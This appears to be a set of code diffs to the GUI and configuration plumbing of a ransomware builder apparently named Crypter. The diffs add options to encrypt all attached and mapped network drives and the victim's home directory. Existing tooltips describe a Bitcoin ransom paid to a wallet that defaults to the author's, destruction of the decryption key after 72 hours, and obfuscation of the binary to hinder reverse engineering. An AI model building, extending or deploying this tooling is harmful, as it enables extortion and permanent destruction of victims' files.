 		bSizer44.Add( self.QuickBuildTitleLabel, 0, wx.ALL|wx.EXPAND, 5 )
 		
 		self.QuickBuildDescriptionLabel = wx.StaticText( self.GuideScrollableWindow, wx.ID_ANY, u"To create the ransomware binary immediately, leave the fields below blank and click the BUILD button. This will produce the ransomware binary with the default settings", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.QuickBuildDescriptionLabel.Wrap( 359 )
-		self.QuickBuildDescriptionLabel.SetFont( wx.Font( 9, 75, 90, 90, False, "Courier" ) )
+		self.QuickBuildDescriptionLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Courier" ) )
 		
 		bSizer44.Add( self.QuickBuildDescriptionLabel, 0, wx.ALL|wx.EXPAND, 10 )
 		
 		self.CustomisingBuildTitleLabel = wx.StaticText( self.GuideScrollableWindow, wx.ID_ANY, u"Customising the ransomware", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.CustomisingBuildTitleLabel.Wrap( 359 )
-		self.CustomisingBuildTitleLabel.SetFont( wx.Font( 9, 75, 90, 92, True, "Courier" ) )
+		self.CustomisingBuildTitleLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, True, "Courier" ) )
 		
 		bSizer44.Add( self.CustomisingBuildTitleLabel, 0, wx.ALL|wx.EXPAND, 5 )
 		
 		self.CustomisingBuildDescriptionLabel = wx.StaticText( self.GuideScrollableWindow, wx.ID_ANY, u"The ransomware can be easily customised by adjusting any or all of the options below. For more information on each field, including a description and the expected input, hover the mouse cursor over the field's label or input box to view its tooltip. \nFields left blank will be set to the default configuration.\n\nTo see an example configuration, click the browse button at the top of the app and load the \"config_example.cfg\" file.", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.CustomisingBuildDescriptionLabel.Wrap( 340 )
-		self.CustomisingBuildDescriptionLabel.SetFont( wx.Font( 9, 75, 90, 90, False, "Courier" ) )
+		self.CustomisingBuildDescriptionLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Courier" ) )
 		
 		bSizer44.Add( self.CustomisingBuildDescriptionLabel, 0, wx.ALL, 10 )
 		
 		self.ManagingConfigurationsTitleLabel = wx.StaticText( self.GuideScrollableWindow, wx.ID_ANY, u"Managing Configurations", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.ManagingConfigurationsTitleLabel.Wrap( 359 )
-		self.ManagingConfigurationsTitleLabel.SetFont( wx.Font( 9, 75, 90, 92, True, "Courier" ) )
+		self.ManagingConfigurationsTitleLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, True, "Courier" ) )
 		
 		bSizer44.Add( self.ManagingConfigurationsTitleLabel, 0, wx.ALL|wx.EXPAND, 5 )
 		
 		self.ManagingConfigurationsDescriptionLabel = wx.StaticText( self.GuideScrollableWindow, wx.ID_ANY, u"Optionally, if you'd like to save your ransomware configuration click the Save button at the bottom of this form. Existing configurations can be loaded by clicking the Load button at the top of the interface.", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.ManagingConfigurationsDescriptionLabel.Wrap( 340 )
-		self.ManagingConfigurationsDescriptionLabel.SetFont( wx.Font( 9, 75, 90, 90, False, "Courier" ) )
+		self.ManagingConfigurationsDescriptionLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Courier" ) )
 		
 		bSizer44.Add( self.ManagingConfigurationsDescriptionLabel, 0, wx.ALL, 10 )
 		
@@ -139,7 +139,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.BuilderLanguageLabel = wx.StaticText( LanguageSettingsSizer.GetStaticBox(), wx.ID_ANY, u"Builder Language", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.BuilderLanguageLabel.Wrap( -1 )
-		self.BuilderLanguageLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.BuilderLanguageLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.BuilderLanguageLabel.SetToolTipString( u"The language of this GUI. Defaults to English." )
 		
 		bSizer202.Add( self.BuilderLanguageLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -170,7 +170,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.DebugLevelLabel = wx.StaticText( DebugSettingsSizer.GetStaticBox(), wx.ID_ANY, u"Debug Level", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.DebugLevelLabel.Wrap( -1 )
-		self.DebugLevelLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.DebugLevelLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.DebugLevelLabel.SetToolTipString( u"The debug level of the build process. Select a higher level to increase the verbosity of the build output shown in the console box below.\n\nDefaults to 1 which provides a small amount of debug information." )
 		
 		bSizer2021.Add( self.DebugLevelLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -212,7 +212,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.PyinstallerAesKeyLabel = wx.StaticText( BinarySettingsSizer.GetStaticBox(), wx.ID_ANY, u"Pyinstaller AES Key", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.PyinstallerAesKeyLabel.Wrap( -1 )
-		self.PyinstallerAesKeyLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.PyinstallerAesKeyLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.PyinstallerAesKeyLabel.SetToolTipString( u"The AES key used by Pyinstaller to encrypt the ransomware script files. This field is optional, but provides Crypter with a layer of obfuscation by making it more difficult to reverse engineer. Leave this field blank if you don't want to use this functionality." )
 		
 		bSizer20321211.Add( self.PyinstallerAesKeyLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -232,7 +232,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.IconLabel = wx.StaticText( BinarySettingsSizer.GetStaticBox(), wx.ID_ANY, u"File Icon", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.IconLabel.Wrap( -1 )
-		self.IconLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.IconLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.IconLabel.SetToolTipString( u"The icon (.ico) file to use for the Crypter executable. If left blank PyInstaller will use its own icon." )
 		
 		bSizer203211111.Add( self.IconLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -257,7 +257,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.UpxDirLabel = wx.StaticText( BinarySettingsSizer.GetStaticBox(), wx.ID_ANY, u"UPX Packer Directory", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.UpxDirLabel.Wrap( -1 )
-		self.UpxDirLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.UpxDirLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.UpxDirLabel.SetToolTipString( u"The path to the UPX Packer directory. If left blank, UPX will not be utilised and the executable will not be packed.\n\nIt is recommended that UPX is used as this can reduce the Crypter executable size by several Megabytes." )
 		
 		bSizer2032111111.Add( self.UpxDirLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -298,13 +298,44 @@ class MainFrame ( wx.Frame ):
 		
 		bSizer39 = wx.BoxSizer( wx.VERTICAL )
 		
+		bSizer412 = wx.BoxSizer( wx.HORIZONTAL )
+		
+		bSizer203213 = wx.BoxSizer( wx.HORIZONTAL )
+		
+		self.EncryptAttachedDrivesCheckbox = wx.CheckBox( RansomwareSettingsSizer.GetStaticBox(), wx.ID_ANY, u"Encrypt Attached Drives", wx.DefaultPosition, wx.DefaultSize, 0 )
+		self.EncryptAttachedDrivesCheckbox.SetToolTipString( u"If ticked, all drives attached to the machine will be encrypted. This includes mapped network drives, as well as external and internal hard disks, but excludes C:." )
+		
+		bSizer203213.Add( self.EncryptAttachedDrivesCheckbox, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )
+		
+		
+		bSizer412.Add( bSizer203213, 2, wx.EXPAND, 5 )
+		
+		
+		bSizer412.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )
+		
+		bSizer2032131 = wx.BoxSizer( wx.HORIZONTAL )
+		
+		self.EncryptUserHomeCheckbox = wx.CheckBox( RansomwareSettingsSizer.GetStaticBox(), wx.ID_ANY, u"Encrypt User Home", wx.DefaultPosition, wx.DefaultSize, 0 )
+		self.EncryptUserHomeCheckbox.SetToolTipString( u"If ticked, all files and folders in the victim's home directory (such as Downloads, Documents and Pictures) will be encrypted." )
+		
+		bSizer2032131.Add( self.EncryptUserHomeCheckbox, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )
+		
+		
+		bSizer412.Add( bSizer2032131, 2, wx.EXPAND, 5 )
+		
+		
+		bSizer39.Add( bSizer412, 1, wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL, 5 )
+		
+		self.m_staticline7 = wx.StaticLine( RansomwareSettingsSizer.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL )
+		bSizer39.Add( self.m_staticline7, 0, wx.EXPAND |wx.ALL, 5 )
+		
 		bSizer41 = wx.BoxSizer( wx.HORIZONTAL )
 		
 		bSizer20321 = wx.BoxSizer( wx.HORIZONTAL )
 		
 		self.EncryptedFileExtensionLabel = wx.StaticText( RansomwareSettingsSizer.GetStaticBox(), wx.ID_ANY, u"Encrypted File Extension", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.EncryptedFileExtensionLabel.Wrap( -1 )
-		self.EncryptedFileExtensionLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.EncryptedFileExtensionLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.EncryptedFileExtensionLabel.SetToolTipString( u"The file extension to use for encrypted files. If left blank, files encrypted by Crypter will be given a .locked extension" )
 		
 		bSizer20321.Add( self.EncryptedFileExtensionLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -324,7 +355,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.WalletAddressLabel = wx.StaticText( RansomwareSettingsSizer.GetStaticBox(), wx.ID_ANY, u"Wallet Address", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.WalletAddressLabel.Wrap( -1 )
-		self.WalletAddressLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.WalletAddressLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.WalletAddressLabel.SetToolTipString( u"The Bitcoin wallet address that the victim should pay the ransom to. This will be displayed in the Crypter GUI. Defaults to the bitcoin wallet of Crypter's author ;-)" )
 		
 		bSizer203211.Add( self.WalletAddressLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -349,7 +380,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.BitcoinFeeLabel = wx.StaticText( RansomwareSettingsSizer.GetStaticBox(), wx.ID_ANY, u"Bitcoin Fee", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.BitcoinFeeLabel.Wrap( -1 )
-		self.BitcoinFeeLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.BitcoinFeeLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.BitcoinFeeLabel.SetToolTipString( u"The Bitcoin Fee that you want to victim to pay. This amount will be shown in the GUI. Defaults to 1.0" )
 		
 		bSizer203212.Add( self.BitcoinFeeLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -369,7 +400,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.KeyDestructionTimeLabel = wx.StaticText( RansomwareSettingsSizer.GetStaticBox(), wx.ID_ANY, u"Key Destruction Time (s)", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.KeyDestructionTimeLabel.Wrap( -1 )
-		self.KeyDestructionTimeLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.KeyDestructionTimeLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.KeyDestructionTimeLabel.SetToolTipString( u"The time in seconds before the victim's decryption key is destroyed. Once the timer runs out, the victim will no longer be able to decrypt their files. Defaults to 259200 (72 hours)." )
 		
 		bSizer2032111.Add( self.KeyDestructionTimeLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -395,7 +426,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.MaxFileSizeLabel = wx.StaticText( RansomwareSettingsSizer.GetStaticBox(), wx.ID_ANY, u"Max File Size to Encrypt (MB)", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.MaxFileSizeLabel.Wrap( -1 )
-		self.MaxFileSizeLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.MaxFileSizeLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.MaxFileSizeLabel.SetToolTipString( u"The maximum size, in Megabytes, of a file that Crypter should encrypt. Any file that exceeds this limit will not be encrypted. Defaults to 512." )
 		
 		bSizer2032121.Add( self.MaxFileSizeLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -415,7 +446,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.FiletypesToEncryptLabel = wx.StaticText( RansomwareSettingsSizer.GetStaticBox(), wx.ID_ANY, u"Filetypes to Encrypt", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.FiletypesToEncryptLabel.Wrap( -1 )
-		self.FiletypesToEncryptLabel.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial Unicode MS" ) )
+		self.FiletypesToEncryptLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial Unicode MS" ) )
 		self.FiletypesToEncryptLabel.SetToolTipString( u"A comma separated list of filetypes to encrypt. Files with these extensions will be encrypted. Leave this field blank to use the default set of common filetypes." )
 		
 		bSizer20321111.Add( self.FiletypesToEncryptLabel, 0, wx.ALL|wx.TOP, 7 )
@@ -444,6 +475,14 @@ class MainFrame ( wx.Frame ):
 		
 		bSizer39.Add( RansomMessageSizer, 4, wx.EXPAND, 5 )
 		
+		bSizer40 = wx.BoxSizer( wx.VERTICAL )
+		
+		
+		bSizer39.Add( bSizer40, 1, wx.EXPAND, 5 )
+		
+		self.m_staticline61 = wx.StaticLine( RansomwareSettingsSizer.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL )
+		bSizer39.Add( self.m_staticline61, 0, wx.EXPAND |wx.ALL, 5 )
+		
 		
 		RansomwareSettingsSizer.Add( bSizer39, 1, wx.EXPAND, 5 )
 		
@@ -460,7 +499,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.SaveConfigurationLabel = wx.StaticText( self.ConfigScrollableWindow, wx.ID_ANY, u"Save configuration", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.SaveConfigurationLabel.Wrap( -1 )
-		self.SaveConfigurationLabel.SetFont( wx.Font( 9, 74, 90, 92, False, "Arial" ) )
+		self.SaveConfigurationLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Arial" ) )
 		
 		bSizer50.Add( self.SaveConfigurationLabel, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )
 		
@@ -530,7 +569,7 @@ class MainFrame ( wx.Frame ):
 		bSizer171 = wx.BoxSizer( wx.VERTICAL )
 		
 		self.BuildButton = wx.Button( self.m_panel4111, wx.ID_ANY, u"BUILD", wx.DefaultPosition, wx.DefaultSize, 0 )
-		self.BuildButton.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial" ) )
+		self.BuildButton.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial" ) )
 		
 		bSizer171.Add( self.BuildButton, 1, wx.ALL|wx.EXPAND, 5 )
 		
@@ -561,19 +600,19 @@ class EncryptFiletypesDialog ( wx.Dialog ):
 		wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Encryptable Filetypes", pos = wx.DefaultPosition, size = wx.Size( 400,500 ), style = wx.CAPTION|wx.CLOSE_BOX|wx.MAXIMIZE_BOX|wx.MINIMIZE_BOX )
 		
 		self.SetSizeHintsSz( wx.Size( -1,-1 ), wx.DefaultSize )
-		self.SetFont( wx.Font( 9, 74, 90, 90, False, "Arial" ) )
+		self.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Arial" ) )
 		
 		bSizer30 = wx.BoxSizer( wx.VERTICAL )
 		
 		bSizer30.SetMinSize( wx.Size( 400,500 ) ) 
 		self.m_staticText15 = wx.StaticText( self, wx.ID_ANY, u"Select the filetypes to encrypt", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.m_staticText15.Wrap( -1 )
-		self.m_staticText15.SetFont( wx.Font( 10, 74, 90, 92, True, "Arial" ) )
+		self.m_staticText15.SetFont( wx.Font( 10, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, True, "Arial" ) )
 		
 		bSizer30.Add( self.m_staticText15, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 20 )
 		
 		self.SelectAllCheckbox = wx.CheckBox( self, wx.ID_ANY, u"Select All", wx.DefaultPosition, wx.DefaultSize, 0 )
-		self.SelectAllCheckbox.SetFont( wx.Font( 9, 74, 90, 92, False, "Arial" ) )
+		self.SelectAllCheckbox.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Arial" ) )
 		
 		bSizer30.Add( self.SelectAllCheckbox, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5 )
 		
@@ -647,7 +686,7 @@ class EncryptFiletypesDialog ( wx.Dialog ):
 		bSizer57.AddSpacer( ( 0, 0), 2, wx.EXPAND, 5 )
 		
 		self.m_checkBox50 = wx.CheckBox( DocumentFilesSizer.GetStaticBox(), wx.ID_ANY, u"Select All", wx.DefaultPosition, wx.DefaultSize, 0 )
-		self.m_checkBox50.SetFont( wx.Font( 9, 74, 90, 92, False, "Arial" ) )
+		self.m_checkBox50.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Arial" ) )
 		
 		bSizer57.Add( self.m_checkBox50, 0, wx.ALL, 10 )
 		

--- a/build/ExeBuilder/BuilderThread.py
+++ b/build/ExeBuilder/BuilderThread.py
@@ -91,6 +91,13 @@ class BuilderThread(Thread):
         @summary: Validates the value of the specified input field
         @raise ValidationException: If validation of the input field fails
         '''
+        
+        # If no regex is set, don't validate
+        if BUILDER_CONFIG_ITEMS[input_field]["validate"] is not True:
+            self.__console_log(msg="Skipping validation for '%s'" % BUILDER_CONFIG_ITEMS[input_field]["label"],
+                               debug_level=3)
+            return
+        
         self.__console_log(msg="%s input should match regex '%s'. Got '%s'" % (
             BUILDER_CONFIG_ITEMS[input_field]["label"],
             BUILDER_CONFIG_ITEMS[input_field]["regex"].pattern,

--- a/build/ExeBuilder/BuilderThread.py
+++ b/build/ExeBuilder/BuilderThread.py
@@ -92,7 +92,7 @@ class BuilderThread(Thread):
         @raise ValidationException: If validation of the input field fails
         '''
         
-        # If no regex is set, don't validate
+        # If item doesn't require validating, skip
         if BUILDER_CONFIG_ITEMS[input_field]["validate"] is not True:
             self.__console_log(msg="Skipping validation for '%s'" % BUILDER_CONFIG_ITEMS[input_field]["label"],
                                debug_level=3)

--- a/build/ExeBuilder/Gui.py
+++ b/build/ExeBuilder/Gui.py
@@ -112,6 +112,18 @@ class Gui(MainFrame):
             self.UpxDirPicker.SetPath(config_dict["upx_dir"])
         else:
             self.UpxDirPicker.SetPath("")
+        # Encrypt Attached Drives
+        if "encrypt_attached_drives" in config_dict:
+            if config_dict["encrypt_attached_drives"]:
+                self.EncryptAttachedDrivesCheckbox.SetValue(True)
+            else:
+                self.EncryptAttachedDrivesCheckbox.SetValue(False)
+        # Encrypt User Home
+        if "encrypt_user_home" in config_dict:
+            if config_dict["encrypt_user_home"]:
+                self.EncryptUserHomeCheckbox.SetValue(True)
+            else:
+                self.EncryptUserHomeCheckbox.SetValue(False)
         # Encrypted File Extension
         if "encrypted_file_extension" in config_dict:
             self.EncryptedFileExtensionTextCtrl.SetValue(config_dict["encrypted_file_extension"])
@@ -353,6 +365,10 @@ class Gui(MainFrame):
         user_input_dict["icon_file"] = self.IconFilePicker.GetPath()
         # UPX Packer Dir
         user_input_dict["upx_dir"] = self.UpxDirPicker.GetPath()
+        # Encrypt Attached Drives
+        user_input_dict["encrypt_attached_drives"] = self.EncryptAttachedDrivesCheckbox.IsChecked()
+        # Encrypt User Home
+        user_input_dict["encrypt_user_home"] = self.EncryptUserHomeCheckbox.IsChecked()
         # Encrypted File Extension
         user_input_dict["encrypted_file_extension"] = self.EncryptedFileExtensionTextCtrl.GetValue()
         # Wallet Address

--- a/build/builder_gui/crypter_builder_final.fbp
+++ b/build/builder_gui/crypter_builder_final.fbp
@@ -1546,6 +1546,7 @@
                                                 <property name="minimum_size"></property>
                                                 <property name="name">LanguageSettingsSizer</property>
                                                 <property name="orient">wxHORIZONTAL</property>
+                                                <property name="parent">1</property>
                                                 <property name="permission">none</property>
                                                 <event name="OnUpdateUI"></event>
                                                 <object class="sizeritem" expanded="0">
@@ -1827,6 +1828,7 @@
                                                 <property name="minimum_size"></property>
                                                 <property name="name">DebugSettingsSizer</property>
                                                 <property name="orient">wxHORIZONTAL</property>
+                                                <property name="parent">1</property>
                                                 <property name="permission">none</property>
                                                 <event name="OnUpdateUI"></event>
                                                 <object class="sizeritem" expanded="0">
@@ -2030,7 +2032,7 @@
                                 <property name="border">5</property>
                                 <property name="flag">wxEXPAND</property>
                                 <property name="proportion">0</property>
-                                <object class="wxBoxSizer" expanded="0">
+                                <object class="wxBoxSizer" expanded="1">
                                     <property name="minimum_size"></property>
                                     <property name="name">bSizer12</property>
                                     <property name="orient">wxVERTICAL</property>
@@ -2119,6 +2121,7 @@
                                                 <property name="minimum_size"></property>
                                                 <property name="name">BinarySettingsSizer</property>
                                                 <property name="orient">wxVERTICAL</property>
+                                                <property name="parent">1</property>
                                                 <property name="permission">none</property>
                                                 <event name="OnUpdateUI"></event>
                                                 <object class="sizeritem" expanded="0">
@@ -2758,11 +2761,11 @@
                                             </object>
                                         </object>
                                     </object>
-                                    <object class="sizeritem" expanded="0">
+                                    <object class="sizeritem" expanded="1">
                                         <property name="border">5</property>
                                         <property name="flag">wxEXPAND | wxALL</property>
                                         <property name="proportion">0</property>
-                                        <object class="wxPanel" expanded="0">
+                                        <object class="wxPanel" expanded="1">
                                             <property name="BottomDockable">1</property>
                                             <property name="LeftDockable">1</property>
                                             <property name="RightDockable">1</property>
@@ -2836,24 +2839,325 @@
                                             <event name="OnSetFocus"></event>
                                             <event name="OnSize"></event>
                                             <event name="OnUpdateUI"></event>
-                                            <object class="wxStaticBoxSizer" expanded="0">
+                                            <object class="wxStaticBoxSizer" expanded="1">
                                                 <property name="id">wxID_ANY</property>
                                                 <property name="label">Ransomware Settings</property>
                                                 <property name="minimum_size"></property>
                                                 <property name="name">RansomwareSettingsSizer</property>
                                                 <property name="orient">wxVERTICAL</property>
+                                                <property name="parent">1</property>
                                                 <property name="permission">none</property>
                                                 <event name="OnUpdateUI"></event>
-                                                <object class="sizeritem" expanded="0">
+                                                <object class="sizeritem" expanded="1">
                                                     <property name="border">5</property>
                                                     <property name="flag">wxEXPAND</property>
                                                     <property name="proportion">1</property>
-                                                    <object class="wxBoxSizer" expanded="0">
+                                                    <object class="wxBoxSizer" expanded="1">
                                                         <property name="minimum_size"></property>
                                                         <property name="name">bSizer39</property>
                                                         <property name="orient">wxVERTICAL</property>
                                                         <property name="permission">none</property>
-                                                        <object class="sizeritem" expanded="0">
+                                                        <object class="sizeritem" expanded="1">
+                                                            <property name="border">5</property>
+                                                            <property name="flag">wxALIGN_CENTER_HORIZONTAL|wxALIGN_CENTER_VERTICAL</property>
+                                                            <property name="proportion">1</property>
+                                                            <object class="wxBoxSizer" expanded="0">
+                                                                <property name="minimum_size"></property>
+                                                                <property name="name">bSizer412</property>
+                                                                <property name="orient">wxHORIZONTAL</property>
+                                                                <property name="permission">none</property>
+                                                                <object class="sizeritem" expanded="0">
+                                                                    <property name="border">5</property>
+                                                                    <property name="flag">wxEXPAND</property>
+                                                                    <property name="proportion">2</property>
+                                                                    <object class="wxBoxSizer" expanded="0">
+                                                                        <property name="minimum_size"></property>
+                                                                        <property name="name">bSizer203213</property>
+                                                                        <property name="orient">wxHORIZONTAL</property>
+                                                                        <property name="permission">none</property>
+                                                                        <object class="sizeritem" expanded="0">
+                                                                            <property name="border">5</property>
+                                                                            <property name="flag">wxALIGN_CENTER_VERTICAL|wxALL</property>
+                                                                            <property name="proportion">0</property>
+                                                                            <object class="wxCheckBox" expanded="0">
+                                                                                <property name="BottomDockable">1</property>
+                                                                                <property name="LeftDockable">1</property>
+                                                                                <property name="RightDockable">1</property>
+                                                                                <property name="TopDockable">1</property>
+                                                                                <property name="aui_layer"></property>
+                                                                                <property name="aui_name"></property>
+                                                                                <property name="aui_position"></property>
+                                                                                <property name="aui_row"></property>
+                                                                                <property name="best_size"></property>
+                                                                                <property name="bg"></property>
+                                                                                <property name="caption"></property>
+                                                                                <property name="caption_visible">1</property>
+                                                                                <property name="center_pane">0</property>
+                                                                                <property name="checked">0</property>
+                                                                                <property name="close_button">1</property>
+                                                                                <property name="context_help"></property>
+                                                                                <property name="context_menu">1</property>
+                                                                                <property name="default_pane">0</property>
+                                                                                <property name="dock">Dock</property>
+                                                                                <property name="dock_fixed">0</property>
+                                                                                <property name="docking">Left</property>
+                                                                                <property name="enabled">1</property>
+                                                                                <property name="fg"></property>
+                                                                                <property name="floatable">1</property>
+                                                                                <property name="font"></property>
+                                                                                <property name="gripper">0</property>
+                                                                                <property name="hidden">0</property>
+                                                                                <property name="id">wxID_ANY</property>
+                                                                                <property name="label">Encrypt Attached Drives</property>
+                                                                                <property name="max_size"></property>
+                                                                                <property name="maximize_button">0</property>
+                                                                                <property name="maximum_size"></property>
+                                                                                <property name="min_size"></property>
+                                                                                <property name="minimize_button">0</property>
+                                                                                <property name="minimum_size"></property>
+                                                                                <property name="moveable">1</property>
+                                                                                <property name="name">EncryptAttachedDrivesCheckbox</property>
+                                                                                <property name="pane_border">1</property>
+                                                                                <property name="pane_position"></property>
+                                                                                <property name="pane_size"></property>
+                                                                                <property name="permission">protected</property>
+                                                                                <property name="pin_button">1</property>
+                                                                                <property name="pos"></property>
+                                                                                <property name="resize">Resizable</property>
+                                                                                <property name="show">1</property>
+                                                                                <property name="size"></property>
+                                                                                <property name="style"></property>
+                                                                                <property name="subclass"></property>
+                                                                                <property name="toolbar_pane">0</property>
+                                                                                <property name="tooltip">If ticked, all drives attached to the machine will be encrypted. This includes mapped network drives, as well as external and internal hard disks, but excludes C:.</property>
+                                                                                <property name="validator_data_type"></property>
+                                                                                <property name="validator_style">wxFILTER_NONE</property>
+                                                                                <property name="validator_type">wxDefaultValidator</property>
+                                                                                <property name="validator_variable"></property>
+                                                                                <property name="window_extra_style"></property>
+                                                                                <property name="window_name"></property>
+                                                                                <property name="window_style"></property>
+                                                                                <event name="OnChar"></event>
+                                                                                <event name="OnCheckBox"></event>
+                                                                                <event name="OnEnterWindow"></event>
+                                                                                <event name="OnEraseBackground"></event>
+                                                                                <event name="OnKeyDown"></event>
+                                                                                <event name="OnKeyUp"></event>
+                                                                                <event name="OnKillFocus"></event>
+                                                                                <event name="OnLeaveWindow"></event>
+                                                                                <event name="OnLeftDClick"></event>
+                                                                                <event name="OnLeftDown"></event>
+                                                                                <event name="OnLeftUp"></event>
+                                                                                <event name="OnMiddleDClick"></event>
+                                                                                <event name="OnMiddleDown"></event>
+                                                                                <event name="OnMiddleUp"></event>
+                                                                                <event name="OnMotion"></event>
+                                                                                <event name="OnMouseEvents"></event>
